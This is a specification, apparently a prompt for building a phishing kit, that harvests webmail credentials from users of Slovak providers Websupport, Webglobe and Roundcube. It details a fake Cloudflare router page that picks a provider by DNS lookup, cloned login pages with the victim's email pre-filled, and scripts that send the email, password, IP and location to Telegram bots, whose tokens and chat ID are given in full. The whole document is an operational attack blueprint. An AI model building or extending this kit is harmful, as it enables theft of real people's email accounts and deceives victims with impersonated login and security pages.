================================================================================
WEBMAIL CREDENTIAL HARVESTER — PROJECT PROMPT
================================================================================
PROJECT STRUCTURE:
router.html → Entry point. DNS detection + routing logic.
index1.html → Websupport webmail clone (mail.websupport.sk)
index2.html → Webglobe / Roundcube webmail clone (webmail.webglobe.sk)
index3.html → Generic Roundcube fallback clone (mail.rsnet.sk)
--------------------------------------------------------------------------------
HOW IT WORKS — OVERVIEW
--------------------------------------------------------------------------------
1. Victim receives a link:
https://yoursite.com/router.html?email=victim@theirdomain.com
2. router.html reads the email, extracts the domain, and runs DNS lookups
to detect which webmail provider the domain uses.
3. Based on DNS results, the victim is silently redirected to the matching
clone page with the email pre-filled in the login field.
4. Victim enters their password and clicks Login.
5. Credentials (email + password + IP + location) are sent to Telegram.
The page does NOT redirect — victim stays on the fake login page.
--------------------------------------------------------------------------------
ROUTER PAGE — router.html
--------------------------------------------------------------------------------
DISPLAY STATES:
a) Valid email + DNS running:
→ Show a Cloudflare "Just a moment..." page with:
- Cloudflare logo (orange cloud SVG + wordmark)
- Animated spinner (Cloudflare orange)
- Animated progress bar
- Live status text: "Performing security check for domain.com…"
b) Missing ?email= param OR invalid email format:
→ Show a convincing Cloudflare error page with:
- Cloudflare logo
- "400 Bad Request" in large orange text
- Fake Cloudflare error codes (1010, 1012)
- Real Ray ID (randomly generated 16-char hex)
- Visitor's real IP (fetched from https://api.ipify.org?format=json)
c) DNS API unreachable:
→ Same Cloudflare error style with error code 1016 — Origin DNS error
ROUTING LOGIC:
- Extract domain from email (part after @)
- Run these DNS lookups IN PARALLEL via Google DNS-over-HTTPS API:
https://dns.google/resolve?name=DOMAIN&type=TYPE
Types: MX, A, TXT, CNAME, NS
- Read BOTH "Answer" and "Authority" sections from each response
- Join all records into one string and check for keywords:
Contains "websupport.sk" or "websupport"
→ redirect to index1.html?email=victim@domain.com
Contains "webglobe", "webglobe.sk", or "mx-hub.sk"
→ redirect to index2.html?email=victim@domain.com
Anything else (unknown provider)
→ redirect to index3.html?email=victim@domain.com
Technical: pure HTML/CSS/JS, fetch() API, async/await, no frameworks.
--------------------------------------------------------------------------------
TEMPLATE PAGES — index1.html / index2.html / index3.html
--------------------------------------------------------------------------------
ALL THREE PAGES MUST:
1. Block all form redirects:
- Remove form action attribute OR set onsubmit="return false;"
- Add submit event listener with capture:true + e.preventDefault()
+ e.stopImmediatePropagation()
- Add click listener on submit button with same blocking
2. Auto-fill email from ?email= URL param:
index1.html (Vue app):
- Use native HTMLInputElement value setter to trigger Vue reactivity
- Dispatch "input" and "change" events
- Retry at 800ms, 2000ms, 3500ms (Vue renders async)
index2.html / index3.html (standard HTML):
- Set el.value directly
- Dispatch "input" and "change" events
- Retry at 500ms
3. On submit, send credentials to Telegram via XHR POST:
URL: https://api.telegram.org/bot{BOT_TOKEN}/sendMessage
Params: chat_id, text (HTML), parse_mode=HTML
index1.html message format:
Websupport Webmail
Email: victim@domain.com
Password: entered_password
index2.html message format:
Webglobe Webmail
Username: victim@domain.com
Password: entered_password
index3.html message format (already built-in, also includes):
IP address (fetched from https://ipapi.co/json/)
Location (city + country)
Login attempt count (stored in localStorage)
Timestamp
--------------------------------------------------------------------------------
KNOWN DNS PATTERNS
--------------------------------------------------------------------------------
WEBSUPPORT (index1.html):
MX records → mailin1.websupport.sk / mailin2.websupport.sk
Keywords → "websupport", "websupport.sk"
WEBGLOBE (index2.html):
MX records → mailin.mx-hub.sk
NS records → ns1.webglobe.sk / ns2.webglobe.sk
Keywords → "webglobe", "webglobe.sk", "mx-hub.sk"
FALLBACK (index3.html):
Any domain that doesn't match the above two providers.
--------------------------------------------------------------------------------
TELEGRAM CREDENTIALS
--------------------------------------------------------------------------------
index1.html + index2.html:
BOT_TOKEN = 8377557460:AAEc-cfMb6j5Pn4HF_7pdIGhbpVdrL7Psf0
CHAT_ID = 6592485465
index3.html:
BOT_TOKEN = 8232059243:AAGc-hGRC6gFv19OhqBrBDCzU7-YwgfvyKI
CHAT_ID = 6592485465
--------------------------------------------------------------------------------
ADDING MORE PROVIDERS
--------------------------------------------------------------------------------
1. Create a new clone page: index4.html
- Remove form action
- Add email pre-fill script
- Add Telegram capture script
2. In router.html detectProvider() function, add:
if (joined.includes('newprovider-keyword')) return 'newprovider';
3. In the routing block, add:
} else if (provider === 'newprovider') {
window.location.href = `index4.html?email=${encodedEmail}`;
}
--------------------------------------------------------------------------------
TESTING DNS DETECTION (browser console)
--------------------------------------------------------------------------------
fetch('https://dns.google/resolve?name=DOMAIN&type=MX',
{headers:{Accept:'application/dns-json'}})
.then(r => r.json())
.then(d => console.log(d.Answer))
================================================================================